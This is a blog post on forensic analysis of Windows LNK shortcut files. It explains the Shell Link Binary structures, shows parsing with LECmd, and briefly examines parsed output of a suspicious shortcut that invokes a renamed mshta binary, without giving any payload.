LNK File Analysis: LNKing It Together!

The purpose of this article is to dig into the Shell Link Binary file format powering LNK files and analyzing how these simple shortcuts (LNKs) are potential gateways to havoc.

Shell Link Binary (File Format)

Figure 1: Overview of the Shell Link Binary file format
  • SHELL_LINK_HEADER
  • LINKTARGET_IDLIST
  • LINKINFO
  • STRING_DATA
  • EXTRA_DATA

SHELL_LINK_HEADER

Figure 2: Overview of the SHELL_LINK_HEADER structure

LINKTARGET_IDLIST

Figure 3: Overview of the LINKTARGET_IDLIST structure

LINKINFO

STRING_DATA

EXTRA_DATA

  • EnvironmentVariableDataBlock structure is useful when the link target has a corresponding environment variable as well
  • TrackerDataBlock offers another way to locate and resolve the link target using the Link Tracking Service — which can help identify if the target file was copied or moved. It can also return information such as the MachineID (NetBIOS name) where the target last existed and a MAC address
Figure 4: Overview of the EXTRA_DATA structure

Parsing LNK Files

LECmd.exe -h
LECmd.exe -f "C:\Users\X\Desktop\HxD.lnk"
Figure 5: Output of LECmd on a Sample LNK file

The Dark Side of LNK Files

Figure 6: How sweet is it?
Figure 7: Call to ‘hsmta’ with a URL (likely a downloader)
Relative Path: ..\..\..\Windows\System32\hsmta.exe...
Local path: C:\Windows\System32\hsmta.exe
...
-File ==> mshta.exe
Short name: hsmta.exe
Modified: 2021-01-02 03:07:32
Extension block count: 1
--------- Block 0 (Beef0004) ---------
Long name: mshta.exe
Created: 2021-01-02 03:07:32
Last access: 2021-01-02 03:07:32
MFT entry/sequence #: 215068/6 (0x3481C/0x6)
...
Environment variables: %windir%\System32\hsmta.exe
...
28636aa6-953d-11d2-b5d6-00c04fd918d0\30 Parsing Path ==> C:\Windows\System32\hsmta.exe
Figure 8: Nothing suspicious here. Just a cmd.exe call… move on.

What Can We Do About It?

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Syed Hasan

Syed Hasan

Hi, I’m Syed. Explore my articles as I embark on this journey of learning more about Forensics and Cloud! 🚀